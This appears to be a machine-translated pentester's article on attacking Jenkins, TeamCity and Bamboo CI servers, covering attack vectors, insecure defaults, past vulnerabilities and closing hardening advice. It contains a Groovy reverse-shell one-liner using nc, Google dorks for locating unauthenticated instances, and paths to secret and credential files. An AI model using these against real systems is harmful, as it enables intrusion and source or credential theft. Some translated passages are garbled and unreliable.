I am a pentester, and it so happened that on almost all projects, even remotely connected with the analysis of the infrastructure of developers, I found installed Jenkins and TeamCity (once I even saw Bamboo). A little google, and I found out that this is all - the so-called continuous integration systems. Of course, at some point in my head began to arise questions like: "And what kind of systems are these?" And "What can I do with them?", Naturally, from the point of view of the pentester. By answering the questions posed, we will understand what benefits a potential attacker can extract and what harm to do within the developer's ecosystem, using only the system of continuous integration available in it.
Agile is fashionable
I think that most of Habr's readers are familiar with such keywords as Agile, Scrum or even Sprint. If suddenly not, then briefly and very roughly it can all be described as follows: the constant release of new finished (that is, having some finite set of functions) application releases. You can read more, for example, in Wikipedia . We will not dwell on this in detail, because a potential attacker, for a successful attack, this knowledge is not particularly needed. However, it is worth noting that every day more and more developers (yes, the majority!) Turn to Agile-faith, and, of course, they are faced with the need to somehow manage all these endless intermediate releases. And it is for this purpose that continuous integration systems are used. ')
Looking ahead, you need to say why these systems may interest the attacker (or, in our case, of course, the pentester) and why you should worry about their security.
First, due to the specifics of their work, they interact directly with the source codes (the leakage of which, in many cases, can mean significant losses for the company).
Secondly - often, for correct assembly of source codes into the final product, system users create so-called assembly scripts, which can be implemented both by means of the continuous integration system itself and using third-party tools (for example, scripts can be downloaded from repositories). In the simplest case, these scripts are batch or bash files, i.e. in fact, they are limited only by the capabilities of the OS on which they are executed. Thus, if the attacker was able to modify the build script, he will be able to execute OS commands directly on the build server.
In addition, as mentioned above, the systems of continuous integration are a convenient tool for managing development, so now they can be found in the internal network of almost every company connected with this sphere in one way or another. And even more, often such systems, for ease of use, put in open access to the Internet.
Continuous integration systems
Continue integration (CI) It has been the 1991 method, [1] although it has been advocated several times a day. It has been adopted that it has adopted more than once a day.
In this article we will rely on a typical software developer ecosystem, the description of which is presented below. If you know (and you probably know) what it is, you can safely skip this section and go straight to the attacks . For everyone else, consider it in more detail.
In the figure we see the following entities:
IDE The developer. Writes the code and at some point commits it to the source code repository.
Repository Source code repository and various metadata about it. From here, the continuous integration system loads the code during the build process.
Continuous integration system Allows you to automate the process of assembling source codes, publishing collected applications, or information about identified problems. Our main goal.
Stand (in the picture looks like a server) In this case, the server on which the application is loaded after a successful build.
Error tracker The system of monitoring and tracking errors in the work or assembly of the application. It is here that the continuous integration system can record a report if it is impossible to successfully complete the assembly of the application.
Now that we know who is who, we will try to describe the approximate sequence of actions performed during the build process of the application.
Consider the picture on the example of a typical sprint: the developer writes the code and loads (1) it into the repository. Further, for any event, a continuous integration system comes into play. It loads the necessary source codes from the repository (2-3) and starts the process of their assembly (4). If successful, the assembled application can be downloaded (5-1) to the stand. In case of failure, the system can create (5-2) task in the bugtracker.
A little about the principles of the system
Below is a brief information that will help identify the attack surface of the system in question.
Role model
If you describe a common role model that can be applied to all popular continuous integration systems, it will look like this:
Anonymous An ordinary user who has neither the knowledge nor the rights within the system under consideration. In fact, a typical casual visitor who was not expected.
User with read access to projects At first glance, it looks as powerless (from an attacker's point of view) as the previous one. However, in some cases, even such rights may be sufficient for a successful escalation of an attack on the entire development infrastructure (see the first picture).
User with access to edit projects An attacker with such access rights will almost 100% compromise the continuous integration system.
Administrator User with the highest level of rights in the system. If the attacker has such rights - this is the end.
Briefly about the components
As seen in the picture, a typical system consists of a number of components. Below we look at each of them in more detail:
Master Controls the operation of the entire system. For example, the wizard is responsible for configuring all components of the system and managing assemblies. In addition, the master has all the features of a slave. Based on its role, the master can interact with all components of the system, as well as with external elements, for example, repositories or stands.
Slave The main task of the slave is the assembly of applications and their temporary storage. Slaves (and there may be a lot of them) are used to parallelize the assembly of projects and some other purposes, for example, access control (see the conclusion).
User interface (usually graphical + some API) Actually, the name is clear - allows the user to control the system. As a rule, it interacts directly with the master, which, in turn, throws tasks to slaves.
Plugins Plug-ins makes sense to allocate a separate category, because in many systems (the same Jenkins, Bamboo or TeamCity) they play a very significant role: here and new methods of authentication, various analyzers or tools for creating reports. Moreover, a large number of plug-ins are already pre-installed out of the box. Thus, plug-ins can significantly expand the capabilities of an attacker, in fact, complementing the existing attack surface. In addition, since plug-ins are often developed by “third parties”, fixing them may take much longer than fixes in the main system.
All your codes belong to them.
Now that we have an understanding of the very essence of continuous integration systems, the time has come to find out exactly what threatens their compromise. To do this, consider a few typical and not-so scenarios of attacks from banal phishing to infection of the collected applications.
Typical Vectors of Continuous Integration Systems
Phishing
The most obvious attack scenario: some vulnerabilities (and, in the case of Jenkins, this may be a full-time feature - UserContent) + the credentials entry page = credentials of inattentive system users and, as a result, the development of an attack on the infrastructure until gaining control over the domain ( if the system uses domain credentials for authorization).
Taking control of the server
Due to the specifics of the system, obtaining remote code execution is a matter of perseverance. Below we consider several ways:
Execution of OS commands on the assembly server (agent or wizard) through the banal vulnerability in the user interface (and, as we remember, there are enough of various web vulnerabilities in these systems).
Another way for Jenkins is described here . However, "as is" it only works on the default configuration when role access and CSRF tokens are disabled. So for operation with high probability an attacker will need some kind of web bug.
A more versatile, but very difficult to implement way - attack through plugins.
Difficult because it will be necessary in one form or another to implement a MitM-attack on the channel receiving plug-ins. It is worth staying in more detail. There are two main ways to deliver a plug-in to a continuous integration system:
Plugin loading by system administrator In this case, the attacker may, for example, somehow get into the channel between the participants of the download and replace the transmitted data.
Download plugin from public plugin repository. Here I allow myself to dream a little.
So, an attacker can try to add his own plugin to the public repository and wait. This scheme, although it looks a little real, may well be feasible.
Another option is to intercept traffic. In essence, it is similar to the first method.
Another way to deliver plugins is to set up your own plugin server .
To implement such a scenario, the attacker will need his own plugin server. For these purposes, perfect server Juseppe . Of course, besides the server, the attacker also needs a plugin. A load fragment for such a plugin can be viewed on a githaba. This plugin used a simple Groovy script to get the reverse shell:
r=Runtime.getRuntime();p = r.exec(["/bin/bash","-c","mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc host port 1>/tmp/backpipe"] as String[]);p.waitFor()
And here is a video demonstrating the performance of such a scheme:
By the way, a funny moment about administration and security: at the time of testing the scheme, the jenkins-31089 bug was registered, the essence of which was the impossibility of setting up the plug-in update server due to problems with checking the plug-in signature. As possible solutions we met, for example, the following:
Check it out. hudson.model.DownloadService.noSignatureCheck to true, but of course.
Those. In principle, they offer to disable signature verification of remotely downloaded plug-ins, which, of course, does not add security.
As a result of the exploitation of this vector, the attacker gains control of the assembly server and all the data that it stores on its file system (including source codes of applications). In addition, gaining control over the server, an attacker can escalate the attack further on the infrastructure.
Source Theft
This vector exploits an interesting feature of many continuous integration systems: the project build process on the file system of the build server (master or slave) is unlimited, therefore, by running the build script, the system can read and write files outside the current build directory. Thus, if an attacker has the ability to modify build scripts (for example, by gaining access to the repository), he can easily steal the source codes of any other projects, since Before assembly, all source codes are added to the temporary directories of the respective projects.
Privilege escalation
Here, privilege escalation is carried out not only and not so much within the system of continuous integration, but within the whole ecosystem of the developer. Example: An attacker from the logs gets ssh keys from the source code repository, thereby increasing his privileges in the context of the repository. Privilege escalation itself can be accomplished in completely different ways, some of which are already described above.
(Un) Typical Vectors of Continuous Integration Systems
Here are collected several attack vectors using the main business processes of continuous integration systems.
Infecting an application with malicious code
A striking example of attacks of this kind: Transmission Torrent Client infection for OS X. If millions of people use your product, the consequences can be predicted. To implement such a scenario, two attack variants come to mind at once. Suppose an attacker does not have access to a repository with code that he wants to infect, but he does have access with editing rights (no matter through a vulnerability or in some other way) to the system of continuous integration. In this case, it is sufficient for an attacker to modify the build script for the attacked project, adding the necessary actions to the list of preconditions that must be performed before starting the actual assembly of the attacked project.
If the attacker does not have access to either the repository or the project, he can try to influence through the project to which he has access by modifying the source codes of the attacked project directly on the file system of the build server. In this case, it is necessary that after the build the server does not clear the build directory. It is worth explaining here that during initialization of the next build, the continuous integration system may not download source codes from the repository, for example, if it does not find any changes since the last download.
Theft of private application signature keys
Stolen keys can be used for different purposes, for example, to sign the attacker's own malicious software.
The video presents one of the ways to implement such an attack.
Botnet?
Why not build a botnet from systems sticking to the Internet? Here is an example of a vulnerable server on the Internet: And now there are many.
You can search on your own using google dorks:
intitle:"Dashboard [Jenkins]" - all internet Jenkins intitle:"Dashboard [Jenkins]" intext:"Manage Jenkins" - all Jenkins without authentication intitle:"Projects - TeamCity" - all TeamCity with guest access intitle:"Register a New User Account - TeamCity" - all TeamCity with open registration
Having considered the above scenarios, it becomes clear that the continuous integration system should be well protected. If you think your system is protected out of the box, then this is far from the case. As a demonstration of this statement, the default settings for several continuous integration systems are presented below.
Jenkins
Firstly, out of the box, for some reason, CSRF tokens are turned off.
Secondly (and this is even cooler!), By default, jenkins does not require any authentication: come in and do what you like. By the way, the matrix role model is implemented as an additional plug-in, which is included in the basic package.
One more example:
TeamCity
By default, anyone can register in the system. After that, often, he will get the role of the Project Manager (which corresponds to the third level of our role model). For example, after registering, the user is assigned the role of the Project Viewer - this also gives the attacker some advantages, and in a couple of sentences I will tell you which ones.
In TeamCity, by default, guest access to the system is allowed, which gives an attacker the right to look through the projects and view the build logs (in fact, the same Project Viewer).
It would seem not so serious, however, due to the features of running build scripts, various interesting information can get into the logs (for example, passwords from ssh or some ftp), and this data will be there in the clear! Thus, guest access + some logs = all passwords are in our pocket. Just like dumpster diving!
In addition, in most of the boxed solutions for continuous integration, the master is by default a slave. This means that the potentially untrusted (who said that a github can be trusted?) The code will be executed in the same place where the configurations of the entire system are stored, as well as the source codes of other projects (perhaps even private ones). Ie, by modifying a piece of the build script that is stored in the public repository, an attacker can get access to the build server configuration as well as the source codes of projects that are built on the same agent. But what configuration data an attacker can access by running his code on the Jenkins and TeamCity wizard:
Jenkins
$ JENKINS_HOME / +:
./secrets/* - various key information: a master key for encrypting user passwords, a seed for generating tokens, and so on.
./workspace/* - the directory contains data (including source codes) of all projects gathered at the current agent.
./userContent/* is essentially the root directory for the web server embedded in Jenkins.
./config.xml is a Jenkins configuration file.
./credentials.xml is a file with Jenkins user accounts (including encrypted passwords).
TeamCity
.BuildServer / config / * - configuration.
buildAgent / work / * - working directory with data about all projects collected on the agent.
$ TEAMCITY_HOME / +
webapps / - the root directory of the distribution teamcity.
logs / teamcity-server.log | grep super - In the logs of TeamCity, you can find the password for the superuser. It is generated randomly with each system start. The superuser has maximum rights.
Summarizing the above, we can safely say that the default settings are insecure from the word at all. However, even if the system is properly configured, there are still a huge number of ways to operate it for its own “dirty” purposes.
What about vulnerabilities?
In systems of continuous integration, as in any other large systems, of course, there are vulnerabilities. The most popular entry point for finding vulnerabilities is various user interfaces. So, in all the systems that I met, a web application is used as a graphical interface, which is characterized by various web vulnerabilities (Hello OWASP ).
Let's start with an interesting vulnerability in older versions of TeamCity. So, the vulnerability allowed access to the registration page, even if the ability to register new users was disabled in the configuration. As a result, this allows an attacker to register and receive a certain set of rights (see previous paragraph) in the system despite direct prohibition from the administrator. More in this article.
Now another example, already from Jenkins. The vulnerability allowed to bypass the CSRF token check in almost any function of the Jenkins web application in all versions up to 1.641 (LTS - 1.625.3) And the whole thing was in the class /core/src/main/java/hudson/security/csrf/CrumbFilter.java, and an incorrect condition for checking the validity of the request:
if (valid || isMultipart(httpRequest)) { chain.doFilter(request, response); } else { LOGGER.log(Level.WARNING, "No valid crumb was included in request for {0}. Returning {1}.", new Object[] {httpRequest.getRequestURI(), HttpServletResponse.SC_FORBIDDEN});
Those. here you can see that the check is considered successful if the valid flag is set, or the request contains data of the type multipart / form-data ( Content-Type: multipart/form-data; boundary=---------------------------blahblah )
Using this vulnerability + for example, a full-time ability to execute shell scripts when building a project, an attacker can modify an arbitrary project to which the victim has access to edit by adding the execution of a shell script as an assembly step. As a result, we get remote code execution on the build machine. For clarity, consider an example: the attacker sends the Jenkins administrator a link to the page hosting the JavaScript code that generates a POST request with Content-Type: multipart / form-data to the URL / view / All / job / test1 / configure. As a result, this request will bypass the protection from CSRF implemented on Jenkins, which will lead to the modification of the project as needed. The start of the project build is implemented in the same way.
Another (very!) Interesting vulnerability in Jenkins is related to the java-objects deserialization by the Jenkins utility CLI. Jenkins CLI - A command line interface for interacting with a Jenkins server. In short, Jenkins CLI interacts with Jenkins through its own protocol, in which all data is transmitted in a serialized form. Learn more about the utility at jenkins-ci.org . The discovered vulnerability allows an unauthorized user to execute arbitrary code in the Jenkins context, operation can also be performed via the Apache Commons library. A detailed description of the vulnerability can be found at foxglovesecurity . There is a similar vulnerability in Bamboo . And since we are talking about deserialization, another bug was recently found, this time in the XStream library, which Jenkins uses to parse xstream xml (for example, here: / CreateItem). A good description of the bug is given here .
findings
Based on the above, when setting up continuous integration systems, additional efforts should be made to ensure their proper protection. And, of course, do not forget about the use of additional tools and technologies to ensure a higher level of protection of such systems within your infrastructure.
And finally - some recommendations
Never use the default settings under any circumstances.
Try not to run the system on all network interfaces. When starting, always specify a specific interface (no 0.0.0.0) - such systems should not “look” on the Internet.
Do not mindlessly install additional plugins and other tools, because often they themselves contain new vulnerabilities.
Timely updated. If you go for a walk, you can see that continuous integration systems are constantly updated (including fixes for critical vulnerabilities), so the right thing will be to monitor the emergence of new Security advisories. Useful links: Jenkins , Bamboo .
If possible, try to isolate projects as much as possible from each other, for example, using separate slaves for each project. If there is not enough iron, you can try making one-time slaves using containers or using existing plugins.